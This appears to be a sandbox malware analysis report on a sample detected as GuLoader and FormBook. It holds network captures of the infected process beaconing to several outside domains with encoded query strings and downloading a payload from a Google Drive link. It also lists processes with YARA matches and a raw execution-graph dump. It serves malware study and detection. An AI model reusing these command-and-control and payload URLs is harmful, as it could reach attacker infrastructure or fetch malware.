                                                                                                                              Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.
Dec 4, 2023 15:29:34.763916969 CET | 1328 | IN
                                                                                                                              Data Ascii: hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>ritualyoga.org</h1><h2>is a totally awesome idea still being
Dec 4, 2023 15:29:34.763979912 CET | 1328 | IN
                                                                                                                              Data Ascii: "https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></u
Dec 4, 2023 15:29:34.764036894 CET | 1328 | IN
                                                                                                                              Data Ascii: 359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1
Dec 4, 2023 15:29:34.764090061 CET | 1328 | IN
                                                                                                                              Data Ascii: M768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.
Dec 4, 2023 15:29:34.764132023 CET | 218 | IN
                                                                                                                              Data Ascii: nt,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.11.20 | 50237 | 37.97.254.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:29:39.943886042 CET | 528 | OUT | GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:29:40.122477055 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                                                              Server: Apache
                                                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              X-Varnish: 1067597919 3
                                                                                                                              Age: 19015378
                                                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 64668
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
Dec 4, 2023 15:29:40.122555971 CET | 1340 | IN
                                                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
Dec 4, 2023 15:29:40.122617006 CET | 1340 | IN
                                                                                                                              Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
Dec 4, 2023 15:29:40.122673035 CET | 1340 | IN
                                                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
Dec 4, 2023 15:29:40.122726917 CET | 1340 | IN
                                                                                                                              Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
                                                                                                                              Dec 4, 2023 15:29:40.122782946 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c
                                                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
                                                                                                                              Dec 4, 2023 15:29:40.122838020 CET1340INData Raw: 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                                              Dec 4, 2023 15:29:40.122994900 CET1340INData Raw: 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
                                                                                                                              Dec 4, 2023 15:29:40.123054028 CET1340INData Raw: 30 31 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e
                                                                                                                              Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
                                                                                                                              Dec 4, 2023 15:29:40.123111010 CET1340INData Raw: 37 2c 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
                                                                                                                              Dec 4, 2023 15:29:40.298896074 CET1340INData Raw: 20 20 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c
                                                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.11.20 | 50238 | 108.179.192.34 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:29:50.616137981 CET | 540 | OUT | GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1
Host: www.metodomestredojogo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:29:50.831990957 CET | 529 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 04 Dec 2023 14:29:50 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.11.20 | 50239 | 198.177.123.106 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:29:56.017821074 CET | 536 | OUT | GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1
Host: www.echolinkevolve.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:29:56.339462996 CET | 602 | IN | HTTP/1.1 404 Not Found
Date: Mon, 04 Dec 2023 14:29:56 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.11.20 | 50240 | 198.252.98.64 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:30:02.618408918 CET | 541 | OUT | GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1
Host: www.rtptornado4dnihboss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:30:02.795258045 CET | 999 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Dec 2023 14:30:02 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 50129 | 142.250.80.46 | 443 | 2384 | C:\Users\user\Desktop\Antndte.exe
Timestamp | Bytes transferred | Direction | Data
2023-12-04 14:22:03 UTC | 216 | OUT | GET /uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: drive.google.com
Cache-Control: no-cache
2023-12-04 14:22:03 UTC | 1732 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 04 Dec 2023 14:22:03 GMT
Location: https://doc-0c-0k-docs.google


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 50130 | 142.251.41.1 | 443 | 2384 | C:\Users\user\Desktop\Antndte.exe
Timestamp | Bytes transferred | Direction | Data
2023-12-04 14:22:04 UTC | 408 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqh00llp67j6c8t9vjf51stn5l/1701699675000/13539573903470379141/*/1YEiS4USubspx63PCPnPvhVVNsu4h-RY3?e=download&uuid=93397b9d-12f9-4f2d-8d03-b765824cb4a8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Cache-Control: no-cache
Host: doc-0c-0k-docs.googleusercontent.com
Connection: Keep-Alive
2023-12-04 14:22:04 UTC | 4462 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: ABPtcPqhnBC87aRdlevOQt_iWmt86OykBeTn3eOlkP-2azPiAyo6fsK44Nm9OfppIzgdf4ClxzFF1AvmyxLV9G5oHqrBtby4iCBc
X-Content-Type-Options: nosniff
Content-Type: application/octet-stream
Content-Disposition: attachment; filename
                                                                                                                              Data Ascii: ick3lUMWV&'_)E%#,J=2+CemCXLk>>;Hc;NTDGS25vV8Gljy v+tCMm9M^>uQ'HV6SuO_/xV+e<k,AC{)7)#6d=P}



                                                                                                                              Target ID:0
                                                                                                                              Start time:15:21:30
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:349'543 bytes
                                                                                                                              MD5 hash:B56BB86C217F7A77D3F862ACF4ECDBE6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.9987160663.0000000000740000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.9988850854.0000000007029000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:15:21:53
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\Antndte.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:349'543 bytes
                                                                                                                              MD5 hash:B56BB86C217F7A77D3F862ACF4ECDBE6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:15:22:05
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe"
                                                                                                                              Imagebase:0xca0000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              Target ID:5
                                                                                                                              Start time:15:22:07
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              Imagebase:0x870000
                                                                                                                              File size:61'440 bytes
                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:6
                                                                                                                              Start time:15:22:19
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe"
                                                                                                                              Imagebase:0xca0000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              Target ID:8
                                                                                                                              Start time:15:22:33
                                                                                                                              Start date:04/12/2023
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                              Imagebase:0x7ff7df120000
                                                                                                                              File size:597'432 bytes
                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true


                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:24.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:13.6%
                                                                                                                                Signature Coverage:19.7%
                                                                                                                                Total number of Nodes:1545
                                                                                                                                Total number of Limit Nodes:44
ImageList_Destroy 5076->5082 5083 405088 5076->5083 5090 405098 5076->5090 5077->5094 5095 404db9 5078->5095 5085 40501f SendMessageW 5079->5085 5079->5104 5080 40427e 8 API calls 5081 405253 5080->5081 5082->5083 5086 405091 GlobalFree 5083->5086 5083->5090 5084 405207 5091 405219 ShowWindow GetDlgItem ShowWindow 5084->5091 5084->5104 5088 405032 5085->5088 5086->5090 5087 404e8e GetWindowLongW SetWindowLongW 5089 404ea7 5087->5089 5099 405043 SendMessageW 5088->5099 5092 404ec5 5089->5092 5093 404ead ShowWindow 5089->5093 5090->5084 5103 404c30 4 API calls 5090->5103 5108 4050d3 5090->5108 5091->5104 5113 40424c SendMessageW 5092->5113 5112 40424c SendMessageW 5093->5112 5094->5070 5094->5075 5095->5087 5098 404e09 SendMessageW 5095->5098 5100 404e88 5095->5100 5101 404e45 SendMessageW 5095->5101 5102 404e56 SendMessageW 5095->5102 5098->5095 5099->5069 5100->5087 5100->5089 5101->5095 5102->5095 5103->5108 5104->5080 5105 4051dd InvalidateRect 5105->5084 5106 4051f3 5105->5106 5114 404b6b 5106->5114 5107 405101 SendMessageW 5111 405117 5107->5111 5108->5107 5108->5111 5110 40518b SendMessageW SendMessageW 5110->5111 5111->5105 5111->5110 5112->5104 5113->5067 5117 404aa2 5114->5117 5116 404b80 5116->5084 5120 404abb 5117->5120 5118 4062a4 17 API calls 5119 404b1f 5118->5119 5121 4062a4 17 API calls 5119->5121 5120->5118 5122 404b2a 5121->5122 5123 4062a4 17 API calls 5122->5123 5124 404b40 lstrlenW wsprintfW SetDlgItemTextW 5123->5124 5124->5116 5125 401563 5126 402a65 5125->5126 5129 4061c9 wsprintfW 5126->5129 5128 402a6a 5129->5128 5130 404365 lstrlenW 5131 404384 5130->5131 5132 404386 WideCharToMultiByte 5130->5132 5131->5132 5133 4046e6 5134 404712 5133->5134 5135 404723 5133->5135 5194 4058c8 GetDlgItemTextW 5134->5194 5136 40472f GetDlgItem 5135->5136 5139 40478e 5135->5139 5138 404743 5136->5138 5143 404757 SetWindowTextW 5138->5143 5146 405bfe 4 API calls 5138->5146 5140 404872 5139->5140 5148 4062a4 17 API calls 5139->5148 5192 404a21 5139->5192 
5140->5192 5196 4058c8 GetDlgItemTextW 5140->5196 5141 40471d 5142 406516 5 API calls 5141->5142 5142->5135 5147 404217 18 API calls 5143->5147 5145 40427e 8 API calls 5150 404a35 5145->5150 5151 40474d 5146->5151 5152 404773 5147->5152 5153 404802 SHBrowseForFolderW 5148->5153 5149 4048a2 5154 405c5b 18 API calls 5149->5154 5151->5143 5157 405b53 3 API calls 5151->5157 5155 404217 18 API calls 5152->5155 5153->5140 5156 40481a CoTaskMemFree 5153->5156 5160 4048a8 5154->5160 5158 404781 5155->5158 5159 405b53 3 API calls 5156->5159 5157->5143 5195 40424c SendMessageW 5158->5195 5162 404827 5159->5162 5197 406282 lstrcpynW 5160->5197 5165 40485e SetDlgItemTextW 5162->5165 5169 4062a4 17 API calls 5162->5169 5164 404787 5168 40665c 5 API calls 5164->5168 5165->5140 5166 4048bf 5167 40665c 5 API calls 5166->5167 5175 4048c6 5167->5175 5168->5139 5170 404846 lstrcmpiW 5169->5170 5170->5165 5172 404857 lstrcatW 5170->5172 5171 404907 5198 406282 lstrcpynW 5171->5198 5172->5165 5174 40490e 5176 405bfe 4 API calls 5174->5176 5175->5171 5180 405b9f 2 API calls 5175->5180 5181 40495f 5175->5181 5177 404914 GetDiskFreeSpaceW 5176->5177 5179 404938 MulDiv 5177->5179 5177->5181 5179->5181 5180->5175 5182 4049d0 5181->5182 5184 404b6b 20 API calls 5181->5184 5183 4049f3 5182->5183 5185 40140b 2 API calls 5182->5185 5199 404239 KiUserCallbackDispatcher 5183->5199 5186 4049bd 5184->5186 5185->5183 5187 4049d2 SetDlgItemTextW 5186->5187 5188 4049c2 5186->5188 5187->5182 5190 404aa2 20 API calls 5188->5190 5190->5182 5191 404a0f 5191->5192 5200 40463f 5191->5200 5192->5145 5194->5141 5195->5164 5196->5149 5197->5166 5198->5174 5199->5191 5201 404652 SendMessageW 5200->5201 5202 40464d 5200->5202 5201->5192 5202->5201 5203 401968 5204 402c15 17 API calls 5203->5204 5205 40196f 5204->5205 5206 402c15 17 API calls 5205->5206 5207 40197c 5206->5207 